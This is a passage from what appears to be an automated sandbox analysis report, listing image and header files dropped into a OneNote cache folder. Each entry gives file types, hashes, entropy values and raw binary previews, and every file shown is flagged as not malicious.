                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000052.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1248x1624, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):49224
                                                                                                  Entropy (8bit):7.402134460714453
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:orJJmT4HVnteV4FrdMiYcx7bfCb6HPdnX2:EvSMVnte8ZP1Y6Jm
                                                                                                  MD5:B7FC313714EDD7866F4C76527282C2B5
                                                                                                  SHA1:C86217B46956933FAE4A30483A63B33F34B8C503
                                                                                                  SHA-256:B6D25F5EB52D5C24EF6C325BD25F18E413F3E23D20413A3693749275BA4B192C
                                                                                                  SHA-512:038A73B7A69DD976C964F1538F5B4F7C6C64721E4F2F1A831815598FAAE84CAC53305C03F5CEA6E66ACDC110A9A5117EEE191345EA004B9576C752122F8D88F7
                                                                                                  Malicious:false
                                                                                                  Preview:......Exif..II*.................Ducky.......-.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:CFCF3A6CA8A811EDBBF3936CDCD6FAAD" xmpMM:DocumentID="xmp.did:CFCF3A6DA8A811EDBBF3936CDCD6FAAD"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:CFCF3A6AA8A811EDBBF3936CDCD6FAAD" stRef:documentID="xmp.did:CFCF3A6BA8A811EDBBF3936CDCD6FAAD"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d....................................................... ..,+++,1111111111............................................!!..!!))())

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000053.bin (copy)

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):567
                                                                                                  Entropy (8bit):7.499095532051442
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:6v/7iQug6mbURgVowGtrjzeC/Gl2QL26YnQQNZTw61VeDp:PRgVqtrjSC/MJ26YQot3E
                                                                                                  MD5:D055CE625528E448C61315EAAEF5BB71
                                                                                                  SHA1:029DF4C872B1C154F32E7FE94F434547C3BA6192
                                                                                                  SHA-256:85BF1E672B4E86E9AF0C7874681EC9620DFDC78E0335B83EEF38C17D813B6705
                                                                                                  SHA-512:705B6B729E967FA946469571109AA892F5CB55A01C74D40AE02140D10CBF9B65DD5E511C06EBFE494E407742F8C6F4FBBE88664B78B37ABFB2F19DB1F66F4247
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR... ... .....szz.....sRGB.........pHYs..........o.d....IDATXG.V... ..7.^z....d},C...X.Zg.J..f..LA=1....9.9.....Oq.........Y..8.eYB.....y.-.....-..lh.ueM...:l..M.h..Z.d5..........e.Av....(..B...~..u.....Z6..x.[.p.x.{|..cb....J....j.O........{..[.DW..k..].m..%pD...<5..u...2....Y...F.B...............x.cb.....r.....c.HS..Dk....a.$v_a....2a....Up.....V.`.D+..B..t;FcBs..^......R.mT.).V;n.$.29..KM....Z..w.s'....@i@./..h..6..P.Z...a....2.....".z... @......P>..{.....3I.:P2..z{v&.B.....+.......G.>4.....}.#.m..9...|...a<!..d....IEND.B`.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\header

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:Matlab v4 mat-file (little endian) @, numeric, rows 262223750, columns 0
                                                                                                  Category:dropped
                                                                                                  Size (bytes):72
                                                                                                  Entropy (8bit):2.560248976384695
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:ulXplRll/aatMSDYvkXaRatl:KDtHIkK8X
                                                                                                  MD5:1C3D98B4372888A24BA73385D6156569
                                                                                                  SHA1:623DDA94D3481A7D49480A8D456B876ABFDB4102
                                                                                                  SHA-256:9ED3ED4C441CA1D6B39821D0404C356B5DAB2562C70A63376DE78764751C3EBA
                                                                                                  SHA-512:C99A20FCB41E32B4ED1991F0DE842C67A6BC8F6110B871B2FE39D99A4470DF28634098811FD87ABE1EB5D3EEDBC1F506E8A14BCF1F9EEAFCA4A3396E77FA94EF
                                                                                                  Malicious:false
                                                                                                  Preview:.....7..........B...@...............|......../.@f-.......,..(...........

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000005.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3679
                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000006.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2232
                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000007.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000008.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13084
                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000009.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000A.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4847
                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000B.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000C.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1657
                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000D.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2210
                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000E.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14458
                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000F.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13030
                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                  Malicious:false
